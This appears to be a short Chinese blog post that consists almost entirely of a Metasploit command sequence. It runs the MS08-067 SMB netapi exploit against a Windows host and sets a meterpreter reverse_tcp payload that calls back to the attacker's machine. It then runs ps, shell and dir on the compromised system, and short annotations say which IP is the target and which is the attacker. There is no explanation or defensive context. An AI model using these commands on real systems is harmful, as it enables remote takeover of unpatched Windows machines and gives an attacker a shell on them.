msfconsole
search ms08_067_natapi
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.0.11(攻击的目的主机IP)
set LHOST 192.168.0.110(攻击的源的主机IP)
set LPORT 8080
exploit
ps
shell
dir
本文出自 “Sim'blog” 博客,请务必保留此出处http://mitac.blog.51cto.com/1081911/1631682
原文地址:http://mitac.blog.51cto.com/1081911/1631682